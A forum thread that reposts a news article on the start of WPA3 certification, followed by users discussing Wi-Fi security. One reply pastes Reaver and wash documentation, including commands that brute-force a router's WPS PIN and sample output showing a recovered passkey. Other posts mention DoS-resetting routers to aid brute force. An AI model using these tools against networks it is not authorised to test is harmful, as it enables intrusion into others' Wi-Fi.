Wi-Fi security is starting to get its biggest upgrade in over a decade (WPA3 certification starts today)

[LASER_oneXM]

Content source

https://www.theverge.com/circuitbreaker/2018/6/26/17501594/wpa3-wifi-security-certification

Wi-Fi devices have been using the same security protocol for over a decade. But today, that’ll begin to change: the Wi-Fi Alliance, which oversees adoption of the Wi-Fi standard, is beginning to certify products that support WPA3, the successor to the WPA2 security protocol that’s been in use since 2004.

The new protocol provides a number of additional protections for devices connected over Wi-Fi. One big improvement makes it harder for hackers to crack your password by guessing it over and over again, and another limits what data hackers can see even once they’ve uncovered the passcode. Nothing will change as far as users see it; you’ll still just type in your password and connect to the network.

WPA3 protections won’t just flip on overnight — in fact, it’s going to be a many-years-long process. First, you’ll have to buy a new router that supports WPA3 (or hope that your old one is updated to support it). The same goes for all your gadgets; you’ll have to buy new ones that support WPA3, or hope your old ones are updated. Fortunately, devices that support WPA3 can still connect with devices that use WPA2, so your gadgets shouldn’t suddenly stop working because you brought something new into the house.

The first big new feature in WPA3 is protection against offline, password-guessing attacks. This is where an attacker captures data from your Wi-Fi stream, brings it back to a private computer, and guesses passwords over and over again until they find a match. With WPA3, attackers are only supposed to be able to make a single guess against that offline data before it becomes useless; they’ll instead have to interact with the live Wi-Fi device every time they want to make a guess. (And that’s harder since they need to be physically present, and devices can be set up to protect against repeat guesses.)

 

[xSploit]

Ruining all the fun

 

[TairikuOkami]

Any info about how long the password can be, since it is the only thing protecting WiFi. WPA2 supports 63 characters.

 

[yitworths]

If WPA3 is resistant to dictionary attack then there must have been some changes in handshake method. tbh, wifi in general is vulnerable, I'm not sure how much changes have been introduced at core. If you are using wifi please try to use reliable vpn even if you are not using a public wifi. there are many other ways to hack your wifi connection. dictionary is just one, I've found many wifi routers get reset to its default if I constantly attack with denial of service, then after that brute force won't be that hard. always use WPS locked AP to be secure against that sort of attack.

 

[Hi Brothers]

WPA locked AP

How do you do that? Do all routers have this option? I don't remember my ISP's (the one they gave me to use in order to plug my ethernet cable, not sure if it should be called a router cuz it was really small) having one

 

[yitworths]

How do you do that? Do all routers have this option?

through router's web manage page disable. btw, DoS attack still can reset your pin to its default value, but you will be immuned against brute-force attack.

 

[Hi Brothers]

through router's web manage page disable. btw, DoS attack still can reset your pin to its default value, but you will be immuned against brute-force attack.

Then what's the point, just use a strong password, that thing ain't getting brute forced anytime soon, for example dashlane automatically generates up to 28 character passwords with letters, symbols, and numbers, but you can always combine a few of those until you hit your router's max password length limit, am I understanding this right?

 

[yitworths]

Then what's the point, just use a strong password, that thing ain't getting brute forced anytime soon, for example dashlane automatically generates up to 28 character passwords with letters, symbols, and numbers, but you can always combine a few of those until you hit your router's max password length limit, am I understanding this right?

we are talking about completely different things. dictionary attack is not same as pin brute-force. even if you use long pass-phrase you are still vulnerable to pin brute-force. through pin-brute force your long pass-phrase can get hacked. Long pass-phrase is good practice & provide greater resistant against dictionary attack. But, pin brute-force doesn't need your pass-phrase to crack your AP.

 

[SumTingWong]

Do we need a new router with WPA 3 or is it going to be a firmware update on current WPA 2 router?

 

[CyberTech]

Do we need a new router with WPA 3 or is it going to be a firmware update on current WPA 2 router?

First, you’ll have to buy a new router that supports WPA3 (or hope that your old one is updated to support it). The same goes for all your gadgets; you’ll have to buy new ones that support WPA3, or hope your old ones are updated. Fortunately, devices that support WPA3 can still connect with devices that use WPA2, so your gadgets shouldn’t suddenly stop working because you brought something new into the house.

 

[SumTingWong]

@CyberTech I guess I will stick with WPA 2 for a while.

 

[yitworths]

@CyberTech I guess I will stick with WPA 2 for a while.

do you think your connection is under threat? I mean do you use your WPA2 surrounded by some hackers. If not, you are all ok for now.

WPA2 falls victim to dictionary attack is due to its handshake method. It uses 4-way handshake. even if you change your passphrase it still uses same key to access a particular client everytime. Now, that's something which really makes hackers very happy. tbh, if I have a handshake theoretically I've your pass-phrase. & trust me, to capture a handshake ain't that hard. As I've already mentioned there are many flaws in wifi & I hope WPA3 isn't just a hype. I still don't have enough info to pass a comment on it, but on the surface I ain't seeing many changes except the handshake method.

 

[SumTingWong]

do you think your connection is under threat? I mean do you use your WPA2 surrounded by some hackers. If not, you are all ok for now.

WPA2 falls victim to dictionary attack is due to its handshake method. It uses 4-way handshake. even if you change your passphrase it still uses same key to access a particular client everytime. Now, that's something which really makes hackers very happy. tbh, if I have a handshake theoretically I've your pass-phrase. & trust me, to capture a handshake ain't that hard. As I've already mentioned there are many flaws in wifi & I hope WPA3 isn't just a hype. I still don't have enough info to pass a comment on it, but on the surface I ain't seeing many changes except the handshake method.

I don't live surrounded by some hackers as far as I can tell. If I want to upgrade to WPA 3, I will need to get a 3rd party router(unless my ISP provided one), and switch from coax line to ethernet line(cable needed).

 

[bribon77]

WPA3, Over time it will be vulnerable, it is also just a matter of time.

 

[yitworths]

I don't live surrounded by some hackers as far as I can tell. If I want to upgrade to WPA 3, I will need to get a 3rd party router(unless my ISP provided one), and switch from coax line to ethernet line(cable needed).

So, you are on coax line... I've never used coax neither I do know any advantage of it over ethernet. But don't ya think ethernet would b better choice between these two?

 

[xSploit]

WPA3, Over time it will be vulnerable, it is also just a matter of time.

Any type of encryption can only last so long before hardware to brute force it becomes readily available or somebody finds a flaw that allows you to crack it even faster.

 

[SumTingWong]

So, you are on coax line... I've never used coax neither I do know any advantage of it over ethernet. But don't ya think ethernet would b better choice between these two?

You only need ethernet line if you are planning to use 3rd party router and speed over 100mbps. Yes, I use coax line for my ISP router because I have no intention of using 3rd party router right now and my speed is at 100mbps. You can easily switch between ethernet and coax line if you can locate the port on the ONT box and call your ISP to deactivate one of them on their end because you can't have ethernet and coax line active at the same time. In term of speed, there's no difference between ethernet line and coax line. Coax line is old, and ethernet line is new. My ISP installed coax line when I signed up for the service.

ONT box > coax line > router > ethernet cable > my PC.

 

[xSploit]

So, you are on coax line... I've never used coax neither I do know any advantage of it over ethernet. But don't ya think ethernet would b better choice between these two?

It is commonly used in a Hybrid fiber-coaxial (HFC) network. Data is transferred electrically over the inner conductor and has 80X more transmission capacity than twisted pair cables. The cost is slightly higher than twisted pair but still considered more economical than fiber.

You can read more about it here: https://www.cablinginstall.com/arti...e-of-coaxial-cable-in-broadband-networks.html

 

[yitworths]

WPA3, Over time it will be vulnerable, it is also just a matter of time.

t

Days gone where dictionary attacks are used to crack the passwords.
REAVER- is enough to crack these since it works on finding the WPS PIN of the router with 95%+ success rate (Personally tested as well)
Before WPA3..security researchers should disable WPS funcionality in all the routers
All the big names belong to that list including belkin and Cisco
Remove WPS * Use alpha numeral with symbols in passkey * Never use WEP*-- SAFE

Reaver
February 18, 2014Stress Testing, Wireless Attacks
Reaver Package Description
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase
Source: Google Code Archive - Long-term storage for Google Code Project Hosting.
Reaver Homepage | Kali Reaver Repo

• Author: Tactical Network Solutions, Craig Heffner
• License: GPLv2

Tools included in the reaver package
reaver – WiFi Protected Setup Attack Tool
root@kali:~# reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help

Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]

Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
wash – WiFi Protected Setup Scan Tool
root@kali:~# wash -h

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help

Example:
wash -i mon0
wash Usage Example
Scan for networks using the monitor mode interface (-i mon0) on channel 6 (-c 6), while ignoring frame checksum errors (-C):
root@kali:~# wash -i mon0 -c 6 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No ASUS
reaver Usage Example
Use the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v):
root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
+
+
+ Pin found-89988762
Passkey: **********

it's not that easy how it may seem. many AP gets locked after some consecutive failure. If WPS is disabled, then you have no luck either. & in case of dictionary attack whether AP is locked or not, is immaterial. But dictionary attack demands more resources also. reaver or bully works differently but you need DoS attack along with these two to crack a WPS enabled AP. & any seasoned hacker can MITM or social engineer many users, but in case of WPS disabled AP there is no way to pin bruteforce it.